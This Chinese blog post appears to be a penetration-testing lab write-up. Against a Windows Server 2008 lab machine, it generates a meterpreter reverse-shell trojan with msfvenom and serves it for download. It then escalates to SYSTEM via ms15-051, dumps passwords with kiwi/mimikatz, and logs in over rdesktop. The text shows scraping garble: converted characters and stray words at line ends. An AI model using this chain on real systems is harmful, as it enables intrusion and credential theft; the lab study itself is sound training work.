本文首发于个人我的博客,记录了我在实验室学习渗透测试所作的第三个实验,以此文记录,但愿能对您有所帮助。html
若是文章哪里有错,请去点击个人我的博客连接进行核对(多是转移博客时候出错了),也能够在评论区留言告知。linux
Metasploit是一款开源的渗透测试工具,能够帮助安全员发现漏洞问题,此工具带有的攻击模块能够帮助安全员简单的利用相关的漏洞。git
本实验经过Metasploit对内网机器进行渗透,而且使用ms15-051进行权限提高,获取Window Server 2008的SYSTEM权限,最后进行远程控制。shell
Metasploit框架使Metasploit具备良好的扩展性,它的控制接口负责发现漏洞、攻击漏洞、提交漏洞,而后经过一些接口加入攻击后处理工具和报表工具。Metasploit框架能够从一个漏洞扫描程序导入数据,使用关于有漏洞主机的详细信息来发现可攻击漏洞,而后使用有效载荷对系统发起攻击。全部这些操做均可以经过Metasploit的Web界面进行管理,而它只是其中一种管理接口,另外还有命令行工具和一些商业工具等。攻击者能够将漏洞扫描程序的结果导入到Metasploit框架的开源安全工具Armitage中,而后经过Metasploit的模块来肯定漏洞。一旦发现了漏洞,攻击者就能够采起一种可行方法攻击系统,经过Shell或启动Metasploit的meterpreter来控制这个系统。这些有效载荷就是在得到本地系统访问后执行的一系列命令。这个过程须要参考一些文档并使用一些数据库技术,在发现漏洞以后开发一种可行的攻击方法,其中有效载荷数据库包含用于提取本地系统密码、安装其余软件或控制硬件等的模块,这些功能很象之前BO2K等工具所具有的功能。数据库
受影响的系统:apache
漏洞成因:Win32.k.sys内核模式驱动程序没有正确处理内存对象,在实现上存在权限提高漏洞windows
漏洞危害:成功利用此漏洞可以使攻击者在内核模式中运行任意代码。安全
漏洞利用:攻击者必须具备有效的登录凭证,而且能够本地登陆以利用此漏洞。服务器
攻击机:Kali Linux框架
靶机:Windows Server 2008
使用msfvenom生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机IP lport=4444 -f exe > shell.exe
安装xampp,并启动。(我安装在了/opt下)
把生成的木马挂在服务器上等待靶机下载
在opt/lampp/htdocs/下建立目录shell,提高shell及其全部文件和子目录的权限为全部人可读可写可执行。chmod命令用法。
把生成的木马复制到网站目录
使用msf的handler模块
设置payload及其参数
payload要和木马的payload一致(即windows/meterpreter/reverse_tcp)
从新启动网站
不要关闭原来的终端,新建终端,从新启动网站。
打开靶机windows server 2008,访问http://攻击机IP/shell
,下载木马shell.exe(先将该网站加入受信任的站点)。下载完成后,运行。
返回攻击机,已成功获取靶机的shell,getuid可查看当前权限
使用ms15-051漏洞,进一步获取system更高权限
首先输入backgroud,把会话切换进后台,以后:
设置payload及其参数
键入run
以攻击,getuid
以并查看当前权限。
攻击成功,而且当前已经是SYSTEM用户。靶机的IP地址为192.168.227.130(后面要用)。
加载kiwi,获取用户密码
若是是windows server 2003,则加载mimikatz,由于我用的靶机为windows server 2008,所以须要用kiwi。其余系统你能够先加载mimikatz,根据提示选择你要加载什么(下图中,我最早加载的是mimikatz,它提示我应该使用kiwi来代替)。
由于我没有给用户设置密码,因此Password一列均为空(这里其实须要设置密码的,后面会讲到)。
远程链接靶机
首先在windows server 2008进行以下设置,容许运行任意版本远程桌面的计算机链接。
而后回到攻击机,新建一个终端,输入rdesktop 靶机IP
,远程链接靶机。
因为rdesktop不支持无密码登陆,所以我此时并不能使用用户名zxy登陆。因此只能先返回windows,在服务管理器中为用户名为zxy的用户设置密码。
再次返回攻击机,使用rdesktop命令远程链接主机,点击“其余用户”,输入用户名zxy和刚刚设置的密码后,链接成功:
成功入侵靶机,查看IP和用户。
至此,实验已所有结束。